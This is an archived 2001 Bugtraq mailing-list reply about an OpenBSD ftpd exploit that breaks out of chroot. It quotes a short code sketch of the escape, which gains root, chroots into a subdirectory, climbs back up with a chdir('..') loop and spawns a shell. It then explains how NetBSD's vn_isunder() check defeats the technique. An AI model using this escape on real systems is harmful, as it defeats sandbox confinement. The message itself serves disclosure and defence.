[20303] in bugtraq
Re: OpenBSD 2.8 ftpd/glob exploit (breaks chroot)
daemon@ATHENA.MIT.EDU (Bill Sommerfeld)
Wed Apr 18 15:39:05 2001
Message-ID: <200104181401.f3IE1tP03684@syn.hamachi.org>
Date: Wed, 18 Apr 2001 10:01:51 -0400
Reply-To: sommerfeld@orchard.arlington.ma.us
From: Bill Sommerfeld <sommerfeld@orchard.arlington.ma.us>
X-To: Tomas Kindahl <stok@CODEFACTORY.SE>
To: BUGTRAQ@SECURITYFOCUS.COM
In-Reply-To: Message from Tomas Kindahl <stok@CODEFACTORY.SE> of "Mon, 16 Apr
2001 15:50:50 +0200." <20010416155050.A2147@codefactory.se>
seteuid(0); a = open("..", O_RDONLY); mkdir("adfa", 555);
chroot("adfa"); fchdir(a); for(cnt = 100; cnt; cnt--)
chdir("..");
chroot(".."); execve("/bin//sh", ..);
For the record, I blocked this way of breaking out of chroot in NetBSD
in 1999; the fix is present in NetBSD 1.4 and later releases. I'm
surprised that this hasn't been picked up by more distributions.
The sys___getcwd() syscall I added for Linux compatibility involved
the extension of the namei cache to track '..' entries; this allows
for efficient implementation of a "vn_isunder()" test, which is used
in several system calls, including chroot(), fchroot(), and fchdir(),
to prevent moving a process's root directory upward, and to prevent a
process's working directory from ever being above its root directory.
When the above above code is executed on NetBSD 1.4 or later, the
chroot() will implicitly chdir() the process to the new root directory
(since it starts off outside), and the "fchdir()" will fail with an
EINVAL, leaving the process stuck inside the chroot.
- Bill
